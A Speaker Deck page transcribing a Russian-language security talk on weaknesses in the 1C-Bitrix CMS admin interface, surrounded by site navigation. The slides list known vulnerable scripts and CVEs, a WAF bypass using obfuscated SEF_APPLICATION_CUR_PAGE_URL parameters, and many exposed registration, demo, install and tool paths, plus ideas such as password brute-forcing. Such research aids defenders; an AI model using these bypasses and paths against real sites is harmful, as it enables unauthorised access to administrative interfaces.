Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
Выйди и зайди нормально
Search
Bo0oM
September 13, 2023
Programming
0
80
Выйди и зайди нормально
О некоторых особенностях административного интерфейса CMS 1С-Битрикс
Bo0oM
September 13, 2023
Tweet
Share
More Decks by Bo0oM
See All by Bo0oM
Носок на сок
bo0om
0
1.8k
Защита от вредоносной автоматизации сегодня
bo0om
0
600
Defending against automatization using nginx
bo0om
0
840
Antibot pitch deck
bo0om
0
160
31337
bo0om
0
190
Your back is white
bo0om
0
370
FTP2RCE
bo0om
1
7.5k
Interpret it!
bo0om
0
1.2k
At Home Among Strangers
bo0om
1
3.9k
Other Decks in Programming
See All in Programming
モビリティSaaSにおけるデータ利活用の発展
nealle
0
170
flutter_kaigi_2025.pdf
kyoheig3
1
320
『実践MLOps』から学ぶ DevOps for ML
nsakki55
2
360
「正規表現をつくる」をつくる / make "make regex"
makenowjust
1
400
AIエージェントでのJava開発がはかどるMCPをAIを使って開発してみた / java mcp for jjug
kishida
4
620
Honoを技術選定したAI要件定義プラットフォームAcsimでの意思決定
codenote
0
170
PyCon mini 東海 2025「個人ではじめるマルチAIエージェント入門 〜LangChain × LangGraphでアイデアを形にするステップ〜」
komofr
3
980
The Past, Present, and Future of Enterprise Java
ivargrimstad
0
490
イベントストーミングのはじめかた / Getting Started with Event Storming
nrslib
1
470
2025 컴포즈 마법사
jisungbin
0
120
ビルドプロセスをデバッグしよう!
yt8492
0
310
CSC509 Lecture 10
javiergs
PRO
0
170
Featured
See All Featured
Measuring & Analyzing Core Web Vitals
bluesmoon
9
670
ピンチをチャンスに:未来をつくるプロダクトロードマップ #pmconf2020
aki_iinuma
127
54k
GraphQLとの向き合い方2022年版
quramy
49
14k
Improving Core Web Vitals using Speculation Rules API
sergeychernyshev
21
1.2k
Principles of Awesome APIs and How to Build Them.
keavy
127
17k
Become a Pro
speakerdeck
PRO
29
5.6k
GraphQLの誤解/rethinking-graphql
sonatard
73
11k
Testing 201, or: Great Expectations
jmmastey
46
7.8k
A Tale of Four Properties
chriscoyier
162
23k
Mobile First: as difficult as doing things right
swwweet
225
10k
The Web Performance Landscape in 2024 [PerfNow 2024]
tammyeverts
11
930
Designing for Performance
lara
610
69k
Transcript
«Выйди и зайди нормально!» Anton Lopanitsyn
КТО Я? • Тыкаю кавычки (атакую). • Запрещаю тыкать кавычки
(защищаю). • Пытаюсь в стартапы по ИБ (passleak.com, antibot.ru) – но нехватает денюшков • Исследую, развлекаюсь, рассказываю об этом Bo0oM
Как обычно ломают Bitrix? • restore.php Система восстановления файлов в
Bitrix • vote/uf.php CVE-2022-27228 • html_editor_action.php CVE-???, вроде ту же самую дали ей)))0) • уязвимости в самописных модулях не покрытых waf’ом Ну тут как будто без комментариев
Исправления
Исправления
None
Обходим первые защиты
SEF_APPLICATION_CUR_PAGE_URL /pewpew/?SEF_APPLICATION_CUR_PAGE_URL=/bitrix/admin/
SEF_APPLICATION_CUR_PAGE_URL /pewpew/?SEF_APPLICATION_CUR_PAGE_URL=/bitrix/admin/ /pewpew/?SEF%20APPLICATION%20CUR%20PAGE_URL=/bitrix/admin/ /pewpew/?SEF+APPLICATION%20CUR+PAGE[URL=/bitrix/admin/
None
None
None
/auth/?register=yes
/crm/?register=yes
/auth/oauth2/?register=yes
Demo /bitrix/wizards/bitrix/demo/public_files/ru/auth/index.php?register=yes /bitrix/wizards/bitrix/demo/modules/examples/public/language/ru/examples/c ustom-registration/index.php /bitrix/wizards/bitrix/demo/modules/examples/public/language/ru/examples/ my-components/news_list.php?register=yes /bitrix/wizards/bitrix/demo/modules/subscribe/public/personal/subscribe/subs cr_edit.php?register=YES&sf_EMAIL=
Demo
Demo
Install /bitrix/modules/bitrix.siteinfoportal/install/wizards/bitrix/infoportal/site/ public/ru/personal/profile/index.php?register=yes /bitrix/modules/bitrix.siteinfoportal/install/wizards/bitrix/infoportal/site/ public/ru/board/my/index.php?register=yes /bitrix/modules/forum/install/admin/forum_index.php
Install
None
Даже если взять и попасть в админку не удалось •
Можно почитать отзывы и обратную связь • Посмотреть списки рассылок • Собрать используемые плагины изнутри • Посмотреть настройки • Побрутить пароли • Собрать дополнительную информацию
Tools /bitrix/tools/catalog_export/yandex_detail.php /bitrix/tools/sale/discount_reindex.php /bitrix/tools/sale/basket_discount_convert.php
Tools
Tools /bitrix/tools/catalog/iblock_catalog_list.php?SHOWALL_1=1
Components /bitrix/components/bitrix/desktop/admin_settings.php /bitrix/components/bitrix/player/player_playlist_edit.php /bitrix/components/bitrix/map.yandex.search/settings/settings.php
Tools /bitrix/tools/bizproc_get_html_editor.php
/bitrix/modules/subscribe/public/subscr_edit.php
smtp
None
None
Никто не знает, что тут
bo0om
nealle
kyoheig3
nsakki55
makenowjust
kishida
codenote
komofr
ivargrimstad
nrslib
.png){kind=avatar}
jisungbin
yt8492
javiergs
bluesmoon
aki_iinuma
quramy
sergeychernyshev
keavy
speakerdeck
sonatard
jmmastey
chriscoyier
swwweet
tammyeverts
lara
